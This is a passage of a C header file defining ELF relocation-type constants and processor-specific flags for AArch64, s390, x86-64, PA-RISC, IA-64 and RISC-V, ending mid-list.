R_AARCH64_LD_PREL_LO19 273 #define R_AARCH64_ADR_PREL_LO21 274 #define R_AARCH64_ADR_PREL_PG_HI21 275 #define R_AARCH64_ADR_PREL_PG_HI21_NC 276 #define R_AARCH64_ADD_ABS_LO12_NC 277 #define R_AARCH64_LDST8_ABS_LO12_NC 278 #define R_AARCH64_LDST16_ABS_LO12_NC 284 #define R_AARCH64_LDST32_ABS_LO12_NC 285 #define R_AARCH64_LDST64_ABS_LO12_NC 286 #define R_AARCH64_LDST128_ABS_LO12_NC 299 /* relocs for control-flow - all offsets as multiple of 4 */ #define R_AARCH64_TSTBR14 279 #define R_AARCH64_CONDBR19 280 #define R_AARCH64_JUMP26 282 #define R_AARCH64_CALL26 283 /* group relocs to create pc-relative offset inline */ #define R_AARCH64_MOVW_PREL_G0 287 #define R_AARCH64_MOVW_PREL_G0_NC 288 #define R_AARCH64_MOVW_PREL_G1 289 #define R_AARCH64_MOVW_PREL_G1_NC 290 #define R_AARCH64_MOVW_PREL_G2 291 #define R_AARCH64_MOVW_PREL_G2_NC 292 #define R_AARCH64_MOVW_PREL_G3 293 /* group relocs to create a GOT-relative offset inline */ #define R_AARCH64_MOVW_GOTOFF_G0 300 #define R_AARCH64_MOVW_GOTOFF_G0_NC 301 #define R_AARCH64_MOVW_GOTOFF_G1 302 #define R_AARCH64_MOVW_GOTOFF_G1_NC 303 #define R_AARCH64_MOVW_GOTOFF_G2 304 #define R_AARCH64_MOVW_GOTOFF_G2_NC 305 #define R_AARCH64_MOVW_GOTOFF_G3 306 /* GOT-relative data relocs */ #define R_AARCH64_GOTREL64 307 #define R_AARCH64_GOTREL32 308 /* GOT-relative instr relocs */ #define R_AARCH64_GOT_LD_PREL19 309 #define R_AARCH64_LD64_GOTOFF_LO15 310 #define R_AARCH64_ADR_GOT_PAGE 311 #define R_AARCH64_LD64_GOT_LO12_NC 312 #define R_AARCH64_LD64_GOTPAGE_LO15 313 /* General Dynamic TLS relocations */ #define R_AARCH64_TLSGD_ADR_PREL21 512 #define R_AARCH64_TLSGD_ADR_PAGE21 513 #define R_AARCH64_TLSGD_ADD_LO12_NC 514 #define R_AARCH64_TLSGD_MOVW_G1 515 #define R_AARCH64_TLSGD_MOVW_G0_NC 516 /* Local Dynamic TLS relocations */ #define R_AARCH64_TLSLD_ADR_PREL21 517 #define R_AARCH64_TLSLD_ADR_PAGE21 518 #define R_AARCH64_TLSLD_ADD_LO12_NC 519 #define R_AARCH64_TLSLD_MOVW_G1 520 #define R_AARCH64_TLSLD_MOVW_G0_NC 521 #define R_AARCH64_TLSLD_LD_PREL19 522 #define R_AARCH64_TLSLD_MOVW_DTPREL_G2 523 #define R_AARCH64_TLSLD_MOVW_DTPREL_G1 524 #define R_AARCH64_TLSLD_MOVW_DTPREL_G1_NC 525 #define R_AARCH64_TLSLD_MOVW_DTPREL_G0 526 #define R_AARCH64_TLSLD_MOVW_DTPREL_G0_NC 527 #define R_AARCH64_TLSLD_ADD_DTPREL_HI12 528 #define R_AARCH64_TLSLD_ADD_DTPREL_LO12 529 #define R_AARCH64_TLSLD_ADD_DTPREL_LO12_NC 530 #define R_AARCH64_TLSLD_LDST8_DTPREL_LO12 531 #define R_AARCH64_TLSLD_LDST8_DTPREL_LO12_NC 532 #define R_AARCH64_TLSLD_LDST16_DTPREL_LO12 533 #define R_AARCH64_TLSLD_LDST16_DTPREL_LO12_NC 534 #define R_AARCH64_TLSLD_LDST32_DTPREL_LO12 535 #define R_AARCH64_TLSLD_LDST32_DTPREL_LO12_NC 536 #define R_AARCH64_TLSLD_LDST64_DTPREL_LO12 537 #define R_AARCH64_TLSLD_LDST64_DTPREL_LO12_NC 538 /* initial exec TLS relocations */ #define R_AARCH64_TLSIE_MOVW_GOTTPREL_G1 539 #define R_AARCH64_TLSIE_MOVW_GOTTPREL_G0_NC 540 #define R_AARCH64_TLSIE_ADR_GOTTPREL_PAGE21 541 #define R_AARCH64_TLSIE_LD64_GOTTPREL_LO12_NC 542 #define R_AARCH64_TLSIE_LD_GOTTPREL_PREL19 543 /* local exec TLS relocations */ #define R_AARCH64_TLSLE_MOVW_TPREL_G2 544 #define R_AARCH64_TLSLE_MOVW_TPREL_G1 545 #define R_AARCH64_TLSLE_MOVW_TPREL_G1_NC 546 #define R_AARCH64_TLSLE_MOVW_TPREL_G0 547 #define R_AARCH64_TLSLE_MOVW_TPREL_G0_NC 548 #define R_AARCH64_TLSLE_ADD_TPREL_HI12 549 #define R_AARCH64_TLSLE_ADD_TPREL_LO12 550 #define R_AARCH64_TLSLE_ADD_TPREL_LO12_NC 551 #define R_AARCH64_TLSLE_LDST8_TPREL_LO12 552 #define R_AARCH64_TLSLE_LDST8_TPREL_LO12_NC 553 #define R_AARCH64_TLSLE_LDST16_TPREL_LO12 554 #define R_AARCH64_TLSLE_LDST16_TPREL_LO12_NC 555 #define R_AARCH64_TLSLE_LDST32_TPREL_LO12 556 #define R_AARCH64_TLSLE_LDST32_TPREL_LO12_NC 557 #define R_AARCH64_TLSLE_LDST64_TPREL_LO12 558 #define R_AARCH64_TLSLE_LDST64_TPREL_LO12_NC 559 /* Dynamic Relocations */ #define R_AARCH64_COPY 1024 #define R_AARCH64_GLOB_DAT 1025 #define R_AARCH64_JUMP_SLOT 1026 #define R_AARCH64_RELATIVE 1027 #define R_AARCH64_TLS_DTPREL64 1028 #define R_AARCH64_TLS_DTPMOD64 1029 #define R_AARCH64_TLS_TPREL64 1030 #define R_AARCH64_TLS_DTPREL32 1031 #define R_AARCH64_TLS_DTPMOD32 1032 #define R_AARCH64_TLS_TPREL32 1033 /* s390 relocations defined by the ABIs */ #define R_390_NONE 0 /* No reloc. */ #define R_390_8 1 /* Direct 8 bit. */ #define R_390_12 2 /* Direct 12 bit. */ #define R_390_16 3 /* Direct 16 bit. */ #define R_390_32 4 /* Direct 32 bit. */ #define R_390_PC32 5 /* PC relative 32 bit. */ #define R_390_GOT12 6 /* 12 bit GOT offset. */ #define R_390_GOT32 7 /* 32 bit GOT offset. */ #define R_390_PLT32 8 /* 32 bit PC relative PLT address. */ #define R_390_COPY 9 /* Copy symbol at runtime. */ #define R_390_GLOB_DAT 10 /* Create GOT entry. */ #define R_390_JMP_SLOT 11 /* Create PLT entry. */ #define R_390_RELATIVE 12 /* Adjust by program base. */ #define R_390_GOTOFF32 13 /* 32 bit offset to GOT. */ #define R_390_GOTPC 14 /* 32 bit PC rel. offset to GOT. */ #define R_390_GOT16 15 /* 16 bit GOT offset. */ #define R_390_PC16 16 /* PC relative 16 bit. */ #define R_390_PC16DBL 17 /* PC relative 16 bit shifted by 1. */ #define R_390_PLT16DBL 18 /* 16 bit PC rel. PLT shifted by 1. */ #define R_390_PC32DBL 19 /* PC relative 32 bit shifted by 1. */ #define R_390_PLT32DBL 20 /* 32 bit PC rel. PLT shifted by 1. */ #define R_390_GOTPCDBL 21 /* 32 bit PC rel. GOT shifted by 1. */ #define R_390_64 22 /* Direct 64 bit. */ #define R_390_PC64 23 /* PC relative 64 bit. */ #define R_390_GOT64 24 /* 64 bit GOT offset. */ #define R_390_PLT64 25 /* 64 bit PC relative PLT address. */ #define R_390_GOTENT 26 /* 32 bit PC rel. to GOT entry >> 1. */ #define R_390_GOTOFF16 27 /* 16 bit offset to GOT. */ #define R_390_GOTOFF64 28 /* 64 bit offset to GOT. */ #define R_390_GOTPLT12 29 /* 12 bit offset to jump slot. */ #define R_390_GOTPLT16 30 /* 16 bit offset to jump slot. */ #define R_390_GOTPLT32 31 /* 32 bit offset to jump slot. */ #define R_390_GOTPLT64 32 /* 64 bit offset to jump slot. */ #define R_390_GOTPLTENT 33 /* 32 bit rel. offset to jump slot. */ #define R_390_PLTOFF16 34 /* 16 bit offset from GOT to PLT. */ #define R_390_PLTOFF32 35 /* 32 bit offset from GOT to PLT. */ #define R_390_PLTOFF64 36 /* 16 bit offset from GOT to PLT. */ #define R_390_TLS_LOAD 37 /* Tag for load insn in TLS code. */ #define R_390_TLS_GDCALL 38 /* Tag for function call in general dynamic TLS code. */ #define R_390_TLS_LDCALL 39 /* Tag for function call in local dynamic TLS code. */ #define R_390_TLS_GD32 40 /* Direct 32 bit for general dynamic thread local data. */ #define R_390_TLS_GD64 41 /* Direct 64 bit for general dynamic thread local data. */ #define R_390_TLS_GOTIE12 42 /* 12 bit GOT offset for static TLS block offset. */ #define R_390_TLS_GOTIE32 43 /* 32 bit GOT offset for static TLS block offset. */ #define R_390_TLS_GOTIE64 44 /* 64 bit GOT offset for static TLS block offset. */ #define R_390_TLS_LDM32 45 /* Direct 32 bit for local dynamic thread local data in LD code. */ #define R_390_TLS_LDM64 46 /* Direct 64 bit for local dynamic thread local data in LD code. */ #define R_390_TLS_IE32 47 /* 32 bit address of GOT entry for negated static TLS block offset. */ #define R_390_TLS_IE64 48 /* 64 bit address of GOT entry for negated static TLS block offset. */ #define R_390_TLS_IEENT 49 /* 32 bit rel. offset to GOT entry for negated static TLS block offset. */ #define R_390_TLS_LE32 50 /* 32 bit negated offset relative to static TLS block. */ #define R_390_TLS_LE64 51 /* 64 bit negated offset relative to static TLS block. */ #define R_390_TLS_LDO32 52 /* 32 bit offset relative to TLS block. */ #define R_390_TLS_LDO64 53 /* 64 bit offset relative to TLS block. */ #define R_390_TLS_DTPMOD 54 /* ID of module containing symbol. */ #define R_390_TLS_DTPOFF 55 /* Offset in TLS block. */ #define R_390_TLS_TPOFF 56 /* Negate offset in static TLS block. */ #define R_390_20 57 /* Keep this the last entry. */ #define R_390_NUM 58 /* x86-64 relocation types */ #define R_X86_64_NONE 0 /* No reloc */ #define R_X86_64_64 1 /* Direct 64 bit */ #define R_X86_64_PC32 2 /* PC relative 32 bit signed */ #define R_X86_64_GOT32 3 /* 32 bit GOT entry */ #define R_X86_64_PLT32 4 /* 32 bit PLT address */ #define R_X86_64_COPY 5 /* Copy symbol at runtime */ #define R_X86_64_GLOB_DAT 6 /* Create GOT entry */ #define R_X86_64_JUMP_SLOT 7 /* Create PLT entry */ #define R_X86_64_RELATIVE 8 /* Adjust by program base */ #define R_X86_64_GOTPCREL 9 /* 32 bit signed pc relative offset to GOT */ #define R_X86_64_32 10 /* Direct 32 bit zero extended */ #define R_X86_64_32S 11 /* Direct 32 bit sign extended */ #define R_X86_64_16 12 /* Direct 16 bit zero extended */ #define R_X86_64_PC16 13 /* 16 bit sign extended pc relative */ #define R_X86_64_8 14 /* Direct 8 bit sign extended */ #define R_X86_64_PC8 15 /* 8 bit sign extended pc relative */ #define R_X86_64_NUM 16 /* Legal values for e_flags field of Elf64_Ehdr. */ #define EF_ALPHA_32BIT 1 /* All addresses are below 2GB */ /* HPPA specific definitions. */ /* Legal values for e_flags field of Elf32_Ehdr. */ #define EF_PARISC_TRAPNIL 0x00010000 /* Trap nil pointer dereference. */ #define EF_PARISC_EXT 0x00020000 /* Program uses arch. extensions. */ #define EF_PARISC_LSB 0x00040000 /* Program expects little endian. */ #define EF_PARISC_WIDE 0x00080000 /* Program expects wide mode. */ #define EF_PARISC_NO_KABP 0x00100000 /* No kernel assisted branch prediction. */ #define EF_PARISC_LAZYSWAP 0x00400000 /* Allow lazy swapping. */ #define EF_PARISC_ARCH 0x0000ffff /* Architecture version. */ /* Defined values for `e_flags & EF_PARISC_ARCH' are: */ #define EFA_PARISC_1_0 0x020b /* PA-RISC 1.0 big-endian. */ #define EFA_PARISC_1_1 0x0210 /* PA-RISC 1.1 big-endian. */ #define EFA_PARISC_2_0 0x0214 /* PA-RISC 2.0 big-endian. */ /* Additional section indeces. */ #define SHN_PARISC_ANSI_COMMON 0xff00 /* Section for tenatively declared symbols in ANSI C. */ #define SHN_PARISC_HUGE_COMMON 0xff01 /* Common blocks in huge model. */ /* Legal values for sh_type field of Elf32_Shdr. */ #define SHT_PARISC_EXT 0x70000000 /* Contains product specific ext. */ #define SHT_PARISC_UNWIND 0x70000001 /* Unwind information. */ #define SHT_PARISC_DOC 0x70000002 /* Debug info for optimized code. */ /* Legal values for sh_flags field of Elf32_Shdr. */ #define SHF_PARISC_SHORT 0x20000000 /* Section with short addressing. */ #define SHF_PARISC_HUGE 0x40000000 /* Section far from gp. */ #define SHF_PARISC_SBP 0x80000000 /* Static branch prediction code. */ /* Legal values for ST_TYPE subfield of st_info (symbol type). */ #define STT_PARISC_MILLICODE 13 /* Millicode function entry point. */ #define STT_HP_OPAQUE (STT_LOOS + 0x1) #define STT_HP_STUB (STT_LOOS + 0x2) /* HPPA relocs. */ #define R_PARISC_NONE 0 /* No reloc. */ #define R_PARISC_DIR32 1 /* Direct 32-bit reference. */ #define R_PARISC_DIR21L 2 /* Left 21 bits of eff. address. */ #define R_PARISC_DIR17R 3 /* Right 17 bits of eff. address. */ #define R_PARISC_DIR17F 4 /* 17 bits of eff. address. */ #define R_PARISC_DIR14R 6 /* Right 14 bits of eff. address. */ #define R_PARISC_PCREL32 9 /* 32-bit rel. address. */ #define R_PARISC_PCREL21L 10 /* Left 21 bits of rel. address. */ #define R_PARISC_PCREL17R 11 /* Right 17 bits of rel. address. */ #define R_PARISC_PCREL17F 12 /* 17 bits of rel. address. */ #define R_PARISC_PCREL14R 14 /* Right 14 bits of rel. address. */ #define R_PARISC_DPREL21L 18 /* Left 21 bits of rel. address. */ #define R_PARISC_DPREL14R 22 /* Right 14 bits of rel. address. */ #define R_PARISC_GPREL21L 26 /* GP-relative, left 21 bits. */ #define R_PARISC_GPREL14R 30 /* GP-relative, right 14 bits. */ #define R_PARISC_LTOFF21L 34 /* LT-relative, left 21 bits. */ #define R_PARISC_LTOFF14R 38 /* LT-relative, right 14 bits. */ #define R_PARISC_SECREL32 41 /* 32 bits section rel. address. */ #define R_PARISC_SEGBASE 48 /* No relocation, set segment base. */ #define R_PARISC_SEGREL32 49 /* 32 bits segment rel. address. */ #define R_PARISC_PLTOFF21L 50 /* PLT rel. address, left 21 bits. */ #define R_PARISC_PLTOFF14R 54 /* PLT rel. address, right 14 bits. */ #define R_PARISC_LTOFF_FPTR32 57 /* 32 bits LT-rel. function pointer. */ #define R_PARISC_LTOFF_FPTR21L 58 /* LT-rel. fct ptr, left 21 bits. */ #define R_PARISC_LTOFF_FPTR14R 62 /* LT-rel. fct ptr, right 14 bits. */ #define R_PARISC_FPTR64 64 /* 64 bits function address. */ #define R_PARISC_PLABEL32 65 /* 32 bits function address. */ #define R_PARISC_PCREL64 72 /* 64 bits PC-rel. address. */ #define R_PARISC_PCREL22F 74 /* 22 bits PC-rel. address. */ #define R_PARISC_PCREL14WR 75 /* PC-rel. address, right 14 bits. */ #define R_PARISC_PCREL14DR 76 /* PC rel. address, right 14 bits. */ #define R_PARISC_PCREL16F 77 /* 16 bits PC-rel. address. */ #define R_PARISC_PCREL16WF 78 /* 16 bits PC-rel. address. */ #define R_PARISC_PCREL16DF 79 /* 16 bits PC-rel. address. */ #define R_PARISC_DIR64 80 /* 64 bits of eff. address. */ #define R_PARISC_DIR14WR 83 /* 14 bits of eff. address. */ #define R_PARISC_DIR14DR 84 /* 14 bits of eff. address. */ #define R_PARISC_DIR16F 85 /* 16 bits of eff. address. */ #define R_PARISC_DIR16WF 86 /* 16 bits of eff. address. */ #define R_PARISC_DIR16DF 87 /* 16 bits of eff. address. */ #define R_PARISC_GPREL64 88 /* 64 bits of GP-rel. address. */ #define R_PARISC_GPREL14WR 91 /* GP-rel. address, right 14 bits. */ #define R_PARISC_GPREL14DR 92 /* GP-rel. address, right 14 bits. */ #define R_PARISC_GPREL16F 93 /* 16 bits GP-rel. address. */ #define R_PARISC_GPREL16WF 94 /* 16 bits GP-rel. address. */ #define R_PARISC_GPREL16DF 95 /* 16 bits GP-rel. address. */ #define R_PARISC_LTOFF64 96 /* 64 bits LT-rel. address. */ #define R_PARISC_LTOFF14WR 99 /* LT-rel. address, right 14 bits. */ #define R_PARISC_LTOFF14DR 100 /* LT-rel. address, right 14 bits. */ #define R_PARISC_LTOFF16F 101 /* 16 bits LT-rel. address. */ #define R_PARISC_LTOFF16WF 102 /* 16 bits LT-rel. address. */ #define R_PARISC_LTOFF16DF 103 /* 16 bits LT-rel. address. */ #define R_PARISC_SECREL64 104 /* 64 bits section rel. address. */ #define R_PARISC_SEGREL64 112 /* 64 bits segment rel. address. */ #define R_PARISC_PLTOFF14WR 115 /* PLT-rel. address, right 14 bits. */ #define R_PARISC_PLTOFF14DR 116 /* PLT-rel. address, right 14 bits. */ #define R_PARISC_PLTOFF16F 117 /* 16 bits LT-rel. address. */ #define R_PARISC_PLTOFF16WF 118 /* 16 bits PLT-rel. address. */ #define R_PARISC_PLTOFF16DF 119 /* 16 bits PLT-rel. address. */ #define R_PARISC_LTOFF_FPTR64 120 /* 64 bits LT-rel. function ptr. */ #define R_PARISC_LTOFF_FPTR14WR 123 /* LT-rel. fct. ptr., right 14 bits. */ #define R_PARISC_LTOFF_FPTR14DR 124 /* LT-rel. fct. ptr., right 14 bits. */ #define R_PARISC_LTOFF_FPTR16F 125 /* 16 bits LT-rel. function ptr. */ #define R_PARISC_LTOFF_FPTR16WF 126 /* 16 bits LT-rel. function ptr. */ #define R_PARISC_LTOFF_FPTR16DF 127 /* 16 bits LT-rel. function ptr. */ #define R_PARISC_LORESERVE 128 #define R_PARISC_COPY 128 /* Copy relocation. */ #define R_PARISC_IPLT 129 /* Dynamic reloc, imported PLT */ #define R_PARISC_EPLT 130 /* Dynamic reloc, exported PLT */ #define R_PARISC_TPREL32 153 /* 32 bits TP-rel. address. */ #define R_PARISC_TPREL21L 154 /* TP-rel. address, left 21 bits. */ #define R_PARISC_TPREL14R 158 /* TP-rel. address, right 14 bits. */ #define R_PARISC_LTOFF_TP21L 162 /* LT-TP-rel. address, left 21 bits. */ #define R_PARISC_LTOFF_TP14R 166 /* LT-TP-rel. address, right 14 bits.*/ #define R_PARISC_LTOFF_TP14F 167 /* 14 bits LT-TP-rel. address. */ #define R_PARISC_TPREL64 216 /* 64 bits TP-rel. address. */ #define R_PARISC_TPREL14WR 219 /* TP-rel. address, right 14 bits. */ #define R_PARISC_TPREL14DR 220 /* TP-rel. address, right 14 bits. */ #define R_PARISC_TPREL16F 221 /* 16 bits TP-rel. address. */ #define R_PARISC_TPREL16WF 222 /* 16 bits TP-rel. address. */ #define R_PARISC_TPREL16DF 223 /* 16 bits TP-rel. address. */ #define R_PARISC_LTOFF_TP64 224 /* 64 bits LT-TP-rel. address. */ #define R_PARISC_LTOFF_TP14WR 227 /* LT-TP-rel. address, right 14 bits.*/ #define R_PARISC_LTOFF_TP14DR 228 /* LT-TP-rel. address, right 14 bits.*/ #define R_PARISC_LTOFF_TP16F 229 /* 16 bits LT-TP-rel. address. */ #define R_PARISC_LTOFF_TP16WF 230 /* 16 bits LT-TP-rel. address. */ #define R_PARISC_LTOFF_TP16DF 231 /* 16 bits LT-TP-rel. address. */ #define R_PARISC_HIRESERVE 255 /* Legal values for p_type field of Elf32_Phdr/Elf64_Phdr. */ #define PT_HP_TLS (PT_LOOS + 0x0) #define PT_HP_CORE_NONE (PT_LOOS + 0x1) #define PT_HP_CORE_VERSION (PT_LOOS + 0x2) #define PT_HP_CORE_KERNEL (PT_LOOS + 0x3) #define PT_HP_CORE_COMM (PT_LOOS + 0x4) #define PT_HP_CORE_PROC (PT_LOOS + 0x5) #define PT_HP_CORE_LOADABLE (PT_LOOS + 0x6) #define PT_HP_CORE_STACK (PT_LOOS + 0x7) #define PT_HP_CORE_SHM (PT_LOOS + 0x8) #define PT_HP_CORE_MMF (PT_LOOS + 0x9) #define PT_HP_PARALLEL (PT_LOOS + 0x10) #define PT_HP_FASTBIND (PT_LOOS + 0x11) #define PT_HP_OPT_ANNOT (PT_LOOS + 0x12) #define PT_HP_HSL_ANNOT (PT_LOOS + 0x13) #define PT_HP_STACK (PT_LOOS + 0x14) #define PT_PARISC_ARCHEXT 0x70000000 #define PT_PARISC_UNWIND 0x70000001 /* Legal values for p_flags field of Elf32_Phdr/Elf64_Phdr. */ #define PF_PARISC_SBP 0x08000000 #define PF_HP_PAGE_SIZE 0x00100000 #define PF_HP_FAR_SHARED 0x00200000 #define PF_HP_NEAR_SHARED 0x00400000 #define PF_HP_CODE 0x01000000 #define PF_HP_MODIFY 0x02000000 #define PF_HP_LAZYSWAP 0x04000000 #define PF_HP_SBP 0x08000000 /* IA-64 specific declarations. */ /* Processor specific flags for the Ehdr e_flags field. */ #define EF_IA_64_MASKOS 0x0000000f /* os-specific flags */ #define EF_IA_64_ABI64 0x00000010 /* 64-bit ABI */ #define EF_IA_64_ARCH 0xff000000 /* arch. version mask */ /* Processor specific values for the Phdr p_type field. */ #define PT_IA_64_ARCHEXT (PT_LOPROC + 0) /* arch extension bits */ #define PT_IA_64_UNWIND (PT_LOPROC + 1) /* ia64 unwind bits */ /* Processor specific flags for the Phdr p_flags field. */ #define PF_IA_64_NORECOV 0x80000000 /* spec insns w/o recovery */ /* Processor specific values for the Shdr sh_type field. */ #define SHT_IA_64_EXT (SHT_LOPROC + 0) /* extension bits */ #define SHT_IA_64_UNWIND (SHT_LOPROC + 1) /* unwind bits */ /* Processor specific flags for the Shdr sh_flags field. */ #define SHF_IA_64_SHORT 0x10000000 /* section near gp */ #define SHF_IA_64_NORECOV 0x20000000 /* spec insns w/o recovery */ /* Processor specific values for the Dyn d_tag field. */ #define DT_IA_64_PLT_RESERVE (DT_LOPROC + 0) #define DT_IA_64_NUM 1 /* IA-64 relocations. */ #define R_IA64_NONE 0x00 /* none */ #define R_IA64_IMM14 0x21 /* symbol + addend, add imm14 */ #define R_IA64_IMM22 0x22 /* symbol + addend, add imm22 */ #define R_IA64_IMM64 0x23 /* symbol + addend, mov imm64 */ #define R_IA64_DIR32MSB 0x24 /* symbol + addend, data4 MSB */ #define R_IA64_DIR32LSB 0x25 /* symbol + addend, data4 LSB */ #define R_IA64_DIR64MSB 0x26 /* symbol + addend, data8 MSB */ #define R_IA64_DIR64LSB 0x27 /* symbol + addend, data8 LSB */ #define R_IA64_GPREL22 0x2a /* @gprel(sym + add), add imm22 */ #define R_IA64_GPREL64I 0x2b /* @gprel(sym + add), mov imm64 */ #define R_IA64_GPREL32MSB 0x2c /* @gprel(sym + add), data4 MSB */ #define R_IA64_GPREL32LSB 0x2d /* @gprel(sym + add), data4 LSB */ #define R_IA64_GPREL64MSB 0x2e /* @gprel(sym + add), data8 MSB */ #define R_IA64_GPREL64LSB 0x2f /* @gprel(sym + add), data8 LSB */ #define R_IA64_LTOFF22 0x32 /* @ltoff(sym + add), add imm22 */ #define R_IA64_LTOFF64I 0x33 /* @ltoff(sym + add), mov imm64 */ #define R_IA64_PLTOFF22 0x3a /* @pltoff(sym + add), add imm22 */ #define R_IA64_PLTOFF64I 0x3b /* @pltoff(sym + add), mov imm64 */ #define R_IA64_PLTOFF64MSB 0x3e /* @pltoff(sym + add), data8 MSB */ #define R_IA64_PLTOFF64LSB 0x3f /* @pltoff(sym + add), data8 LSB */ #define R_IA64_FPTR64I 0x43 /* @fptr(sym + add), mov imm64 */ #define R_IA64_FPTR32MSB 0x44 /* @fptr(sym + add), data4 MSB */ #define R_IA64_FPTR32LSB 0x45 /* @fptr(sym + add), data4 LSB */ #define R_IA64_FPTR64MSB 0x46 /* @fptr(sym + add), data8 MSB */ #define R_IA64_FPTR64LSB 0x47 /* @fptr(sym + add), data8 LSB */ #define R_IA64_PCREL60B 0x48 /* @pcrel(sym + add), brl */ #define R_IA64_PCREL21B 0x49 /* @pcrel(sym + add), ptb, call */ #define R_IA64_PCREL21M 0x4a /* @pcrel(sym + add), chk.s */ #define R_IA64_PCREL21F 0x4b /* @pcrel(sym + add), fchkf */ #define R_IA64_PCREL32MSB 0x4c /* @pcrel(sym + add), data4 MSB */ #define R_IA64_PCREL32LSB 0x4d /* @pcrel(sym + add), data4 LSB */ #define R_IA64_PCREL64MSB 0x4e /* @pcrel(sym + add), data8 MSB */ #define R_IA64_PCREL64LSB 0x4f /* @pcrel(sym + add), data8 LSB */ #define R_IA64_LTOFF_FPTR22 0x52 /* @ltoff(@fptr(s+a)), imm22 */ #define R_IA64_LTOFF_FPTR64I 0x53 /* @ltoff(@fptr(s+a)), imm64 */ #define R_IA64_LTOFF_FPTR32MSB 0x54 /* @ltoff(@fptr(s+a)), data4 MSB */ #define R_IA64_LTOFF_FPTR32LSB 0x55 /* @ltoff(@fptr(s+a)), data4 LSB */ #define R_IA64_LTOFF_FPTR64MSB 0x56 /* @ltoff(@fptr(s+a)), data8 MSB */ #define R_IA64_LTOFF_FPTR64LSB 0x57 /* @ltoff(@fptr(s+a)), data8 LSB */ #define R_IA64_SEGREL32MSB 0x5c /* @segrel(sym + add), data4 MSB */ #define R_IA64_SEGREL32LSB 0x5d /* @segrel(sym + add), data4 LSB */ #define R_IA64_SEGREL64MSB 0x5e /* @segrel(sym + add), data8 MSB */ #define R_IA64_SEGREL64LSB 0x5f /* @segrel(sym + add), data8 LSB */ #define R_IA64_SECREL32MSB 0x64 /* @secrel(sym + add), data4 MSB */ #define R_IA64_SECREL32LSB 0x65 /* @secrel(sym + add), data4 LSB */ #define R_IA64_SECREL64MSB 0x66 /* @secrel(sym + add), data8 MSB */ #define R_IA64_SECREL64LSB 0x67 /* @secrel(sym + add), data8 LSB */ #define R_IA64_REL32MSB 0x6c /* data 4 + REL */ #define R_IA64_REL32LSB 0x6d /* data 4 + REL */ #define R_IA64_REL64MSB 0x6e /* data 8 + REL */ #define R_IA64_REL64LSB 0x6f /* data 8 + REL */ #define R_IA64_LTV32MSB 0x74 /* symbol + addend, data4 MSB */ #define R_IA64_LTV32LSB 0x75 /* symbol + addend, data4 LSB */ #define R_IA64_LTV64MSB 0x76 /* symbol + addend, data8 MSB */ #define R_IA64_LTV64LSB 0x77 /* symbol + addend, data8 LSB */ #define R_IA64_PCREL21BI 0x79 /* @pcrel(sym + add), 21bit inst */ #define R_IA64_PCREL22 0x7a /* @pcrel(sym + add), 22bit inst */ #define R_IA64_PCREL64I 0x7b /* @pcrel(sym + add), 64bit inst */ #define R_IA64_IPLTMSB 0x80 /* dynamic reloc, imported PLT, MSB */ #define R_IA64_IPLTLSB 0x81 /* dynamic reloc, imported PLT, LSB */ #define R_IA64_COPY 0x84 /* copy relocation */ #define R_IA64_SUB 0x85 /* Addend and symbol difference */ #define R_IA64_LTOFF22X 0x86 /* LTOFF22, relaxable. */ #define R_IA64_LDXMOV 0x87 /* Use of LTOFF22X. */ #define R_IA64_TPREL14 0x91 /* @tprel(sym + add), imm14 */ #define R_IA64_TPREL22 0x92 /* @tprel(sym + add), imm22 */ #define R_IA64_TPREL64I 0x93 /* @tprel(sym + add), imm64 */ #define R_IA64_TPREL64MSB 0x96 /* @tprel(sym + add), data8 MSB */ #define R_IA64_TPREL64LSB 0x97 /* @tprel(sym + add), data8 LSB */ #define R_IA64_LTOFF_TPREL22 0x9a /* @ltoff(@tprel(s+a)), imm2 */ #define R_IA64_DTPMOD64MSB 0xa6 /* @dtpmod(sym + add), data8 MSB */ #define R_IA64_DTPMOD64LSB 0xa7 /* @dtpmod(sym + add), data8 LSB */ #define R_IA64_LTOFF_DTPMOD22 0xaa /* @ltoff(@dtpmod(sym + add)), imm22 */ #define R_IA64_DTPREL14 0xb1 /* @dtprel(sym + add), imm14 */ #define R_IA64_DTPREL22 0xb2 /* @dtprel(sym + add), imm22 */ #define R_IA64_DTPREL64I 0xb3 /* @dtprel(sym + add), imm64 */ #define R_IA64_DTPREL32MSB 0xb4 /* @dtprel(sym + add), data4 MSB */ #define R_IA64_DTPREL32LSB 0xb5 /* @dtprel(sym + add), data4 LSB */ #define R_IA64_DTPREL64MSB 0xb6 /* @dtprel(sym + add), data8 MSB */ #define R_IA64_DTPREL64LSB 0xb7 /* @dtprel(sym + add), data8 LSB */ #define R_IA64_LTOFF_DTPREL22 0xba /* @ltoff(@dtprel(s+a)), imm22 */ /* RISC-V relocations. */ #define R_RISCV_NONE 0 #define R_RISCV_32 1 #define R_RISCV_64 2 #define R_RISCV_RELATIVE 3 #define R_RISCV_COPY 4 #define R_RISCV_JUMP_SLOT 5 #define R_RISCV_TLS_DTPMOD32 6 #define R_RISCV_TLS_DTPMOD64 7 #define R_RISCV_TLS_DTPREL32 8 #define R_RISCV_TLS_DTPREL64 9 #define R_RISCV_TLS_TPREL32 10 #define R_RISCV_TLS_TPREL64 11 #define R_RISCV_BRANCH 16 #define R_RISCV_JAL 17 #define R_RISCV_CALL 18 #define R_RISCV_CALL_PLT 19 #define R_RISCV_GOT_HI20 20 #define R_RISCV_TLS_GOT_HI20 21 #define R_RISCV_TLS_GD_HI20 22 #define R_RISCV_PCREL_HI20 23 #define R_RISCV_PCREL_LO12_I 24 #define R_RISCV_PCREL_LO12_S 25 #define R_RISCV_HI20 26 #define R_RISCV_LO12_I 27 #define R_RISCV_LO12_S 28 #define R_RISCV_TPREL_HI20 29 #define R_RISCV_TPREL_LO12_I 30 #define R_RISCV_TPREL_LO12_S 31 #define R_RISCV_TPREL_ADD 32 #define R_RISCV_ADD8 33 #define R_RISCV_ADD16 34 #define R_RISCV_ADD32 35 #define R_RISCV_ADD64 36 #define R_RISCV_SUB8 37 #define R_RISCV_SUB16 38 #define R_RISCV_SUB32 39 #define R_RISCV_SUB64 40 #define R_RISCV_GNU_VTINHERIT 41 #define R_RISCV_GNU_VTENTRY 42 #define R_RISCV_ALIGN 43 #define R_RISCV_RVC_BRANCH 44 #define R_RISCV_RVC_JUMP 45 #define R_RISCV_RVC_LUI 46 #define R_RISCV_GPREL_I 47 #define R_RISCV_GPREL_S 48 #define R_RISCV_TPREL_I 49 #define R_RISCV_TPREL_S 50 #define R_RISCV_RELAX 51 #define R_RISCV_SUB6 52 #define R_RISCV_SET6 53 #define R_RISCV_SET8 54 #define R_RISCV_SET16 